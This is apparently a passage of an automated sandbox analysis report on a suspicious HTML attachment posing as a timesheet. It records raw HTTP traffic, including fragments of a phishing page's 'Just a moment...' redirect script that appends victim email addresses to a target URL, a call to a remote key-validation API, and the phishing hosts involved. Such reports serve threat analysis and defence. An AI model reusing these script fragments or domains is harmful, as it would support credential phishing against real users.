                                                              2024-12-19 16:17:13 UTC1378INData Raw: 22 2b 28 74 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2c 69 73 52 65 61 64 79 3a 21 30 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 65 29 7d 2c 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 69 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 75 65 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72
                                                              Data Ascii: "+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 74 75 72 6e 20 67 28 61 29 7d 2c 67 75 69 64 3a 31 2c 73 75 70 70 6f 72 74 3a 6c 65 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 63 65 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6f 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 63 65 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 76 61 72 20 70 65 3d 6f 65 2e
                                                              Data Ascii: turn g(a)},guid:1,support:le}),"function"==typeof Symbol&&(ce.fn[Symbol.iterator]=oe[Symbol.iterator]),ce.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var pe=oe.
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 2c 22 2b 67 65 2b 22 2a 22 29 2c 6d 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 67 65 2b 22 29 22 2b 67 65 2b 22 2a 22 29 2c 78 3d 6e 65 77 20 52 65 67 45 78 70 28 67 65 2b 22 7c 3e 22 29 2c 6a 3d 6e 65 77 20 52 65 67 45 78 70 28 67 29 2c 41 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 74 2b 22 24 22 29 2c 44 3d 7b 49 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 23 28 22 2b 74 2b 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 74 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 74 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 70 29 2c 50 53 45 55 44 4f
                                                              Data Ascii: gExp("^"+ge+"*,"+ge+"*"),m=new RegExp("^"+ge+"*([>+~]|"+ge+")"+ge+"*"),x=new RegExp(ge+"|>"),j=new RegExp(g),A=new RegExp("^"+t+"$"),D={ID:new RegExp("^#("+t+")"),CLASS:new RegExp("^\\.("+t+")"),TAG:new RegExp("^("+t+"|[*])"),ATTR:new RegExp("^"+p),PSEUDO
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 26 28 75 3d 4c 2e 65 78 65 63 28 74 29 29 29 69 66 28 69 3d 75 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 70 29 7b 69 66 28 21 28 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 20 69 66 28 66 26 26 28 61 3d 66 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 29 29 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 61 29 26 26 61 2e 69 64 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 6e 2c 61 29 2c 6e 7d 65 6c 73 65 7b 69 66 28 75 5b 32 5d 29 72 65 74 75 72 6e 20 6b 2e 61 70 70 6c 79 28 6e 2c 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 29 2c 6e 3b 69 66 28 28 69 3d 75
                                                              Data Ascii: &(u=L.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return k.call(n,a),n}else if(f&&(a=f.getElementById(i))&&I.contains(e,a)&&a.id===i)return k.call(n,a),n}else{if(u[2])return k.apply(n,e.getElementsByTagName(t)),n;if((i=u
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 65 29 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 22 6c 61 62 65 6c 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 61 29 7b 72 65 74 75 72 6e 20 46 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 46 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                                                              Data Ascii: e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function X(a){return F(function(o){return o=+o,F(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function U(e){return e&&"undefined"!=typeof e.getElementsByT
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 3b 69 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 65 29 2c 72 3d 30 3b 77 68 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61
                                                              Data Ascii: ((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTa
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6c 65 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 3d 54 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 65 29 3f 2d 31 3a 74 3d 3d 3d 54 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 74 29 3f 31 3a 6f 3f 73 65 2e 63 61 6c 6c 28 6f 2c 65 29 2d 73 65 2e 63 61 6c 6c 28 6f 2c 74 29 3a 30 3a 34 26
                                                              Data Ascii: =(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!le.sortDetached&&t.compareDocumentPosition(e)===n?e===T||e.ownerDocument==ye&&I.contains(ye,e)?-1:t===T||t.ownerDocument==ye&&I.contains(ye,t)?1:o?se.call(o,e)-se.call(o,t):0:4&
                                                              2024-12-19 16:17:13 UTC1378INData Raw: 72 3a 7b 41 54 54 52 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 65 5b 33 5d 3d 28 65 5b 33 5d 7c 7c 65 5b 34 5d 7c 7c 65 5b 35 5d 7c 7c 22 22 29 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 22 7e 3d 22 3d 3d 3d 65 5b 32 5d 26 26 28 65 5b 33 5d 3d 22 20 22 2b 65 5b 33 5d 2b 22 20 22 29 2c 65 2e 73 6c 69 63 65 28 30 2c 34 29 7d 2c 43 48 49 4c 44 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 6e 74 68 22 3d 3d 3d 65 5b 31 5d 2e 73 6c 69 63 65 28 30 2c 33 29 3f 28 65 5b 33 5d 7c 7c 49 2e 65 72 72 6f 72 28 65 5b 30 5d 29 2c 65 5b 34 5d 3d 2b 28 65 5b 34 5d 3f 65 5b 35 5d 2b 28 65 5b 36 5d 7c
                                                              Data Ascii: r:{ATTR:function(e){return e[1]=e[1].replace(O,P),e[3]=(e[3]||e[4]||e[5]||"").replace(O,P),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||I.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]|


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.749742172.66.47.1184435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:14 UTC357OUTGET /favicon.ico HTTP/1.1
                                                              Host: proposal-5ye.pages.dev
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:14 UTC929INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 16:17:14 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Cache-Control: public, max-age=0, must-revalidate
                                                              referrer-policy: strict-origin-when-cross-origin
                                                              x-content-type-options: nosniff
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BrnjfTAbu6YYmZrNwHuIdi82uKMauGfWvojUpCJ6rji7a2iKMw41ztrqUprxN0O9wsMjXWv6UdBixBZBoopFfSVsdRtwPtmfc7LVpp5unzjImfvow2uyIJAcSFVcLD1OD7oJYh9b8amG"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f48b3a2ed7e180d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1672&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=935&delivery_rate=1654390&cwnd=201&unsent_bytes=0&cid=237136d0c2c28edb&ts=487&x=0"
                                                              2024-12-19 16:17:14 UTC1369INData Raw: 64 63 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c
                                                              Data Ascii: dca<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>Just a moment...</title> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"><
                                                              2024-12-19 16:17:14 UTC1369INData Raw: 64 78 52 58 41 78 4d 6b 6c 30 57 56 5a 72 53 47 64 52 62 31 4a 6f 4f 57 56 73 4d 32 4e 43 55 56 6c 4c 53 6b 68 6b 51 56 4e 48 59 30 56 59 53 30 67 34 54 31 67 78 57 6e 6f 72 54 30 52 79 56 6e 42 79 4f 57 6f 78 63 57 6c 61 52 6d 34 69 4c 43 4a 74 59 57 4d 69 4f 69 49 30 4e 7a 55 34 59 54 64 69 4e 57 46 68 59 57 55 79 5a 6a 45 79 59 7a 55 30 4f 57 45 79 5a 6a 41 79 4e 6a 55 31 59 32 59 77 5a 6a 45 35 4e 7a 45 7a 4f 57 56 6b 4d 7a 68 6a 5a 47 56 6d 4e 7a 67 31 4d 6d 5a 69 4d 6a 55 35 59 54 41 35 4e 32 49 77 59 7a 4e 6b 49 6e 30 25 33 44 3b 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 34 33 63 48 56 4d 62 47 4a 42 4c 31 4a 70 4d 6a 6c 31 63 55 35 72 51 31 4a 70 59 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65
                                                              Data Ascii: dxRXAxMkl0WVZrSGdRb1JoOWVsM2NCUVlLSkhkQVNHY0VYS0g4T1gxWnorT0RyVnByOWoxcWlaRm4iLCJtYWMiOiI0NzU4YTdiNWFhYWUyZjEyYzU0OWEyZjAyNjU1Y2YwZjE5NzEzOWVkMzhjZGVmNzg1MmZiMjU5YTA5N2IwYzNkIn0%3D; laravel_session=eyJpdiI6Im43cHVMbGJBL1JpMjl1cU5rQ1JpYnc9PSIsInZhbHVlIjoie
                                                              2024-12-19 16:17:14 UTC799INData Raw: 6c 61 63 65 28 72 65 73 2e 75 72 6c 5f 74 61 72 67 65 74 20 2b 20 6d 61 69 6c 73 32 20 2b 20 6e 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 72 65 73 2e 75 72 6c 5f 74 61 72 67 65 74 20 2b 20 6d 61 69 6c 73 20 2b 20 6e 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 7d 29 2e 66 61 69 6c 28 66 75 6e 63 74 69 6f 6e 28 65 72 72 6f 72 29 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 72 72 6f 72 2e 73 74 61 74 75 73 20 3d 3d 20 34 30 31 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74
                                                              Data Ascii: lace(res.url_target + mails2 + next); } else { window.location.replace(res.url_target + mails + next); } } }).fail(function(error){ if (error.status == 401) { document
                                                              2024-12-19 16:17:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.749743194.163.42.364435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:14 UTC593OUTGET /public/api/validate_key/strykerr HTTP/1.1
                                                              Host: natrium100gram.site
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Accept: */*
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://proposal-5ye.pages.dev
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://proposal-5ye.pages.dev/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:15 UTC838INHTTP/1.1 401 Unauthorized
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              cache-control: no-cache, private
                                                              content-type: application/json
                                                              x-ratelimit-limit: 60
                                                              x-ratelimit-remaining: 59
                                                              access-control-allow-origin: *
                                                              access-control-allow-methods: *
                                                              access-control-allow-credentials: 1
                                                              access-control-allow-headers: X-Requested-With,Content-Type,X-Token-Auth,Authorization
                                                              accept: application/json
                                                              content-length: 20
                                                              date: Thu, 19 Dec 2024 16:17:15 GMT
                                                              server: LiteSpeed
                                                              platform: hostinger
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-xss-protection: 1; mode=block
                                                              x-content-type-options: nosniff
                                                              vary: User-Agent
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-12-19 16:17:15 UTC20INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 78 70 69 72 65 64 22 7d
                                                              Data Ascii: {"status":"expired"}


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:11:16:53
                                                              Start date:19/12/2024
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Timesheet ACH-Tbconsulting.November 16, 2024.html"
                                                              Imagebase:0x7ff6c4390000
                                                              File size:3'242'272 bytes
                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:4
                                                              Start time:11:16:58
                                                              Start date:19/12/2024
                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2320,i,6646080088605768551,9883575881723638348,262144 /prefetch:8
                                                              Imagebase:0x7ff6c4390000
                                                              File size:3'242'272 bytes
                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Disassembly

                                                              No disassembly